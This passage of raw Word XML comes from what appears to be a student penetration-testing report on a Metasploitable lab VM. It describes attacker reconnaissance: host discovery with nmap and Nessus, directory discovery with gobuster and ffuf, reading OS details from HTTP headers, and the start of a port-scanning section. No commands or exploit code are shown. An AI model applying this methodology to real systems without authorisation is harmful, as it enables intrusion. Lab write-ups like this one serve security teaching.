        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00184DF4" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003153AF" w:rsidRPr="00FA5B3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829D9C3" w14:textId="00CF780A" w:rsidR="001A4B1A" w:rsidRPr="00FA5B3B" w:rsidRDefault="00533B3A" w:rsidP="001A4B1A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30E9A31F" wp14:editId="55793659">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2293620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2943225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="971166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66136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B1A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Fig.</w:t>
      </w:r>
      <w:r w:rsidR="00DC5FAA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="001A4B1A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap host discovery scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B309116" w14:textId="471485FD" w:rsidR="001A4B1A" w:rsidRPr="00FA5B3B" w:rsidRDefault="00533B3A" w:rsidP="00533B3A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 xml:space="preserve">Fig.6 Nessus host discovery configuration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098943DA" w14:textId="082A2BE2" w:rsidR="00363F61" w:rsidRPr="00FA5B3B" w:rsidRDefault="008908A4" w:rsidP="00363F61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BF87AD" wp14:editId="6CA01CAE">
            <wp:extent cx="5731510" cy="1799590"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="546395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95351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B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Fig.</w:t>
      </w:r>
      <w:r w:rsidR="00DC5FAA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nessus host discovery result </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D2EAC7" w14:textId="4856AD08" w:rsidR="008908A4" w:rsidRPr="00FA5B3B" w:rsidRDefault="001C4008" w:rsidP="00E37478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However, since </w:t>
      </w:r>
      <w:r w:rsidR="007448FD" w:rsidRPr="00FA5B3B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7448FD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>metasp</w:t>
      </w:r>
      <w:r w:rsidR="0051112F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="007448FD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>oitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007448FD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51112F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>is hosted on a virtual machine</w:t>
      </w:r>
      <w:r w:rsidR="00E15FD8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> while 192.168.137.128 is the attacker, </w:t>
      </w:r>
      <w:r w:rsidR="00EC5561" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.137.133 is the only target address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9F603D" w14:textId="3901FF24" w:rsidR="00986E38" w:rsidRPr="00FA5B3B" w:rsidRDefault="003901F3" w:rsidP="00E37478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957A114" wp14:editId="6B4F693B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>487680</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>462915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4753610" cy="502920"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1894625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25338" name="Picture 18946253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CF059F9" wp14:editId="7F2BBEAE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>950595</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4753610" cy="3436620"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="11680524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2491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38" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Next, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="002E5A74" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">will </w:t>
      </w:r>
      <w:r w:rsidR="004C05A4" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">try to </w:t>
      </w:r>
      <w:r w:rsidR="003C42BE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>discover hidden with server</w:t>
      </w:r>
      <w:r w:rsidR="00CA672F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> using tool</w:t>
      </w:r>
      <w:r w:rsidR="00DC5FAA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC5FAA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC5FAA" w:rsidRPr="00FA5B3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C5FAA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC5FAA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002609FF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Usable</w:t>
      </w:r>
      <w:r w:rsidR="00790254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2609FF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00790254" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>esult</w:t>
      </w:r>
      <w:r w:rsidR="002609FF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide from both are the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617DCAC" w14:textId="4867F9A9" w:rsidR="00F86722" w:rsidRPr="00FA5B3B" w:rsidRDefault="00DC5FAA" w:rsidP="00DC5FAA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9 Directory discover</w:t>
      </w:r>
      <w:r w:rsidR="007904C9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007904C9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007904C9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007904C9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007904C9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED07DB" w14:textId="2CDE7B25" w:rsidR="007E7945" w:rsidRPr="00FA5B3B" w:rsidRDefault="00347E38" w:rsidP="00EE03B6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ab/>
      </w:r>
      <w:r w:rsidR="007E7945" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Fina</w:t>
      </w:r>
      <w:r w:rsidR="00D84DDE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lly, the</w:t>
      </w:r>
      <w:r w:rsidR="008910F8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> operating system</w:t>
      </w:r>
      <w:r w:rsidR="00F44A69" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (OS)</w:t>
      </w:r>
      <w:r w:rsidR="0051097C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, which can be </w:t>
      </w:r>
      <w:r w:rsidR="00E15CFC" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>challenging without scanning,</w:t>
      </w:r>
      <w:r w:rsidR="00EA7D86" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the attacker can utilize the header of </w:t>
      </w:r>
      <w:r w:rsidR="00EB2B93" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the server http response using </w:t>
      </w:r>
      <w:r w:rsidR="00367656" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>network capture and interception tools such as Wireshark and Burp Suite, or simply the browser developer console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1CF162" w14:textId="712ED641" w:rsidR="00D47717" w:rsidRPr="00FA5B3B" w:rsidRDefault="00367656" w:rsidP="005761FB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B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7A8D9DC" wp14:editId="620D3653">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3977640</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1562100" cy="906780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="43267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748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AAB0959" wp14:editId="4E943A94">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1958340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2011680" cy="899160"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="4889234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23441" name="Picture 3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748E856" wp14:editId="1F55E7BE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>22860</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1927860" cy="975360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="29671884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8841" name="Picture 2" descr="A screen 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B0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig.10 </w:t>
      </w:r>
      <w:r w:rsidR="006316BF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="002A4C59" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>esponse</w:t>
      </w:r>
      <w:r w:rsidR="006316BF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> header</w:t>
      </w:r>
      <w:r w:rsidR="002A4C59" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> capture</w:t>
      </w:r>
      <w:r w:rsidR="006316BF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="0024130B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r w:rsidR="006316BF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="007E7945" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Burp Suite/Browser Dev Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458961B5" w14:textId="532F08E1" w:rsidR="00001D3E" w:rsidRPr="00FA5B3B" w:rsidRDefault="00001D3E" w:rsidP="00001D3E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FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00F2004D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F2004D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2744D3E1" w14:textId="29C2364C" w:rsidR="003D2504" w:rsidRPr="00FA5B3B" w:rsidRDefault="00566494" w:rsidP="00E25963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During the second phase, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00A8309C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">primary goal is to </w:t>
      </w:r>
      <w:r w:rsidR="00DB7ADF" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">actively interact with the target to </w:t>
      </w:r>
      <w:r w:rsidR="006D294E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">gain even more information. </w:t>
      </w:r>
      <w:r w:rsidR="001D75F5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>This process d</w:t>
      </w:r>
      <w:r w:rsidR="004F2FF9" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ive deeper into the target infrastructure</w:t>
      </w:r>
      <w:r w:rsidR="00B75943" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, including identifying the service</w:t>
      </w:r>
      <w:r w:rsidR="006D294E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00CF6166" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, open port, operation system (if have not been found), </w:t>
      </w:r>
      <w:r w:rsidR="00F44A69" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>version of services and OS running in the server</w:t>
      </w:r>
      <w:r w:rsidR="006D1517" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Using gained information, attacker can use vulnerability scanner </w:t>
      </w:r>
      <w:r w:rsidR="0069462A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to find vulnerabilities for the next phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563034F8" w14:textId="1AA922E0" w:rsidR="00DE3161" w:rsidRPr="00FA5B3B" w:rsidRDefault="005836F3" w:rsidP="00AD0CB8">
      <w:pPr>
        <w:jc w:val="both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ab/>
      </w:r>
      <w:r w:rsidR="00536C52" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>First, the hacker</w:t>
      </w:r>
      <w:r w:rsidR="0061758E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536C52" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>perform</w:t>
      </w:r>
      <w:r w:rsidR="0061758E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00277D39" w:rsidRPr="00FA5B3B"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 w:rsidR="00277D39" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>scaning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00277D39" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00536C52" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> port scanning</w:t>
      </w:r>
      <w:r w:rsidR="00C06FB2" w:rsidRPr="00FA5B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FB2" w:rsidRPr="00FA5B3B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="00C06FB2" w:rsidRPr="00FA5B3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C06FB2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C06FB2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ports</w:t>
      </w:r>
      <w:r w:rsidR="00607E1F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006242CB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap OS detection is based on the </w:t>
      </w:r>
      <w:r w:rsidR="004B0E42" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>fingerprint found</w:t>
      </w:r>
      <w:r w:rsidR="006242CB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4B0E42" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00C83249" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
